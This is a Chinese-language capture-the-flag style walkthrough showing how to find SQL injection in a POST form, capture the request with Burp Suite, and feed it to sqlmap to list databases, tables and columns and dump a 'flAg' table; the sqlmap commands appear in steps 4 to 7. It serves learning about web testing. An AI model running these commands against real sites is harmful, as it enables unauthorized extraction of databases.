sqlmap注入——POST检测点方法

目录

    • 一、题目
    • 二、解题过程
            • 1、 在输入框输入`'`号,发现有错误提示,说明存在sql注入
            • 2、 判断注入方式
            • 3、 sqlmap注入——POST检测点
            • 4、sqlmap注入获取数据库信息
            • 5、查看某个数据库中的表
            • 6、查看某个表中的列

一、题目

sqlmap注入——POST检测点方法_第1张图片

二、解题过程

1、 在输入框输入'号,发现有错误提示,说明存在sql注入

sqlmap注入——POST检测点方法_第2张图片

2、 判断注入方式

输入数字1我们可以看到他从数据库中调出了数据,从burpsuite的抓包情况来看,提交了id1=1&submit=Submit,但是url地址栏却没有任何显示,所以是post请求(如果是get请求则会在url地址栏中显示)

sqlmap注入——POST检测点方法_第3张图片

3、 sqlmap注入——POST检测点

将burpsuit抓包到的request请求内容复制到一个文本文件然后改名为.log后缀名的文件如下所示,然后进行注入

sqlmap注入——POST检测点方法_第4张图片

4、sqlmap注入获取数据库信息
sqlmap  -l ~/桌面/sqlmap.log --dbs

sqlmap注入——POST检测点方法_第5张图片
sqlmap注入——POST检测点方法_第6张图片

5、查看某个数据库中的表
sqlmap  -l ~/桌面/sqlmap.log -D web1 --table

sqlmap注入——POST检测点方法_第7张图片
sqlmap注入——POST检测点方法_第8张图片

6、查看某个表中的列
sqlmap  -l ~/桌面/sqlmap.log -D web1 --table -T flAg --colum

sqlmap注入——POST检测点方法_第9张图片

sqlmap注入——POST检测点方法_第10张图片

7、具体到列的详细信息

sqlmap  -l ~/桌面/sqlmap.log -D web1 --table -T flAg --colum --dump

sqlmap注入——POST检测点方法_第11张图片

sqlmap注入——POST检测点方法_第12张图片

你可能感兴趣的:(sqlmap,SQL注入,web安全)